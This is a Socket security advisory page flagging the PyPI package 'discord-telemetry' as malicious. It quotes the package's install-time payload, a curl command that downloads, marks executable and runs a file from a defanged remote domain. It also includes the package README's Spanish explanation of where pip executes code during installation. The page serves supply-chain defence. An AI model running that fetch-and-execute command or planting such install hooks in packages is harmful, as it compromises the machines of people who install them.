🎩 You're Invited:Meet the Socket team at Black Hat in Las Vegas, August 3-6.RSVP
Sign In

discord-telemetry

Package Overview
Dependencies
Maintainers
0
Versions
6
Alerts
File Explorer

Advanced tools

Socket logo

Install Socket

Detect and block malicious and high-risk dependencies

Install
This package has been flagged as malicious. It is considered unsafe regardless of version.

The file implements a malicious installer/build-time payload. It defines a function that executes the shell command `curl -o e -s https://gaming-telemetry[.]com/v1/download & chmod +x e & ./e`, which downloads a remote file from `gaming-telemetry[.]com`, saves it as `e`, marks it executable, and immediately runs it.

discord-telemetry

Paquete de ejemplo que imprime 'discord-telemetry'

pipPyPI
Version
0.1.5
Weekly downloads
0
Maintainers
0
Weekly downloads
 

discord-telemetry

Paquete de ejemplo. Al importarlo imprime discord-telemetry:

import discord_telemetry   # imprime: discord-telemetry

O como comando (entry point):

discord-telemetry

¿Dónde ejecuta código pip durante la instalación?

  • pyproject.toml[build-system]: declara el build backend que pip invoca para construir el paquete desde un sdist.
  • setup.py: código Python que setuptools ejecuta durante el build. Los overrides de cmdclass (build_py, install, develop) son el equivalente al postinstall de npm.
  • [project.scripts]: no corre en install; genera un ejecutable que corre cuando el usuario lo invoca.
  • __init__.py: corre en import time (runtime), no en install.

Regla de seguridad clave: instalar un wheel NO ejecuta código del paquete (solo se descomprime). Construir/instalar un sdist SÍ ejecuta el build backend (setup.py). Por eso el vector real vive en el sdist.

FAQs

Did you know?

Socket

Socket for GitHub automatically highlights issues in each pull request and monitors the health of all your open source dependencies. Discover the contents of your packages and block harmful activity before you install or update your dependencies.

Install

Related posts